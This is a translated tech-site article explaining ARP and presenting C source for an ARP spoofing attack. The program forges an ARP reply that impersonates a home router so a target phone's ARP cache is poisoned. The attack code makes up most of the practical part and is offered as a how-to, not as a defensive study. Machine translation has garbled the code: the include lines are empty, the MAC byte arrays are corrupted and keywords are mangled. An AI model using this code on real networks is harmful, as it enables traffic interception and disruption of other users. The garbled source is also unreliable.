Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to implement arp attacks in Linux. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something according to this article.

ARP:Address Resolution Protocol address Resolution Protocol. It is a link layer protocol. Work at the second layer of the OSI model.

Because Ethernet switching devices can not directly recognize 32-bit IP addresses. In fact, they all transmit data with 48-bit MAC addresses, so there needs to be a correspondence between MAC addresses and IP addresses when working. The ARP protocol is used to determine this relationship.

All machines in the network contain an ARP cache, which stores the correspondence between the most recent MAC address and the IP address in the local network. Normally, when the ARP is working, the requesting host sends an Ethernet broadcast data containing the destination IP, and then the destination IP sends out a reply packet with the IP address and the corresponding MAC address. In this way, the requesting host can get a pair of IP addresses and MAC addresses, and then put this set of correspondence into the ARP cache. The ARP cache table uses the aging mechanism, and a row in the table will be deleted without being used for a period of time.

For a host on a local area network, if it receives an ARP reply message, even if it does not send a request message or is not the reply message of its target IP, the host will cache the IP and MAC addresses in the message.

In this way, we just have to convince the target host that our MAC address is the MAC address of the gateway. Convince the gateway of the target host that our MAC address is under attack

The MAC of the target host, then all messages sent to the target host will be sent to our host.

Soul mapping time

The following is a practice: the attacker is my Ubuntu computer, and the one being attacked is my Huawei phone.

The code is as follows:

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# include

# define print_errno (fmt,...)\ printf ("[% d] errno=%d (% s) #" fmt,\ _ _ LINE__, errno, strerror (errno), # _ _ VA_ARGS__)

Static unsigned char s_ip_frame_ data[ETH _ DATA_LEN]

Static unsigned int s_ip_frame_size = 0

Int main (int argc,char** argv) {

Struct ether_header * eth = NULL

Struct ether_arp * arp = NULL

Struct ifreq ifr

Struct in_addr daddr

Struct in_addr saddr

Struct sockaddr_ll sll

Int skfd;int n = 0

Unsigned char DMac [ETH _ ALEN] = {0x38ref 0x37rec 0x8Brec 0xC3re0x61je 0x4D}; / / the mac address of the attacked object

Daddr.s_addr = inet_addr ("192.168.0.125"); / / ip address of the attacked object

Unsigned char smac [ETH _ ALEN] = {0x01rec 0x02rec 0x03rec 0x04j0x05rec 0x06}; / / change the arp table of the attacked object to this fake mac address

Saddr.s_addr = inet_addr ("192.168.0.1"); / / Router

Memset (s_ip_frame_data, 0x00, sizeof (unsigned char) * ETH_DATA_LEN); skfd = socket (PF_PACKET, SOCK_RAW, htons (ETH_P_ALL))

If (skfd

< 0) { print_errno("socket() failed! \n"); return -1; } bzero(&ifr,sizeof(ifr)); strcpy(ifr.ifr_name, "wlp8s0");//这里是我的网卡名字，要改为你的网卡名字，使用ifconfig查看 if (-1 == ioctl(skfd, SIOCGIFINDEX, &ifr)) { print_errno("ioctl() SIOCGIFINDEX failed!\n"); return -1; } printf("ifr_ifindex = %d\n", ifr.ifr_ifindex); bzero(&sll, sizeof(sll)); sll.sll_ifindex = ifr.ifr_ifindex; sll.sll_family = PF_PACKET; sll.sll_protocol = htons(ETH_P_ALL); eth = (struct ether_header*)s_ip_frame_data; eth->

Ether_type = htons (ETHERTYPE_ARP)

Memcpy (eth- > ether_dhost, dmac, ETH_ALEN)

Memcpy (eth- > ether_shost, smac, ETH_ALEN); arp = (struct ether_arp*) (s_ip_frame_data + sizeof (struct ether_header)); arp- > arp_hrd = htons (ARPHRD_ETHER); arp- > arp_pro = htons (ETHERTYPE_IP); arp- > arp_hln = ETH_ALEN; arp- > arp_pln = 4; arp- > arp_op = htons (ARPOP_REPLY) / / ARPOP_REQUEST ARPOP_REPLY I use replay, as for request you do it yourself, I won't talk about it.

Memcpy (arp- > arp_sha, smac, ETH_ALEN)

Memcpy (arp- > arp_spa, & saddr.s_addr, 4)

Memcpy (arp- > arp_tha, dmac, ETH_ALEN)

Memcpy (arp- > arp_tpa, & daddr.s_addr, 4); s_ip_frame_size = sizeof (struct ether_header) + sizeof (struct ether_arp); n = sendto (skfd, s_ip_frame_data, s_ip_frame_size, 0,\ (struct sockaddr*) & sll, sizeof (sll))

If (n < 0) {print_errno ("sendto () failed!\ n");} else {

Printf ("sendto () n =% d\ n", n);} close (skfd)

Return 0;} after reading the above, do you have any further understanding of how to implement arp attacks in Linux? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.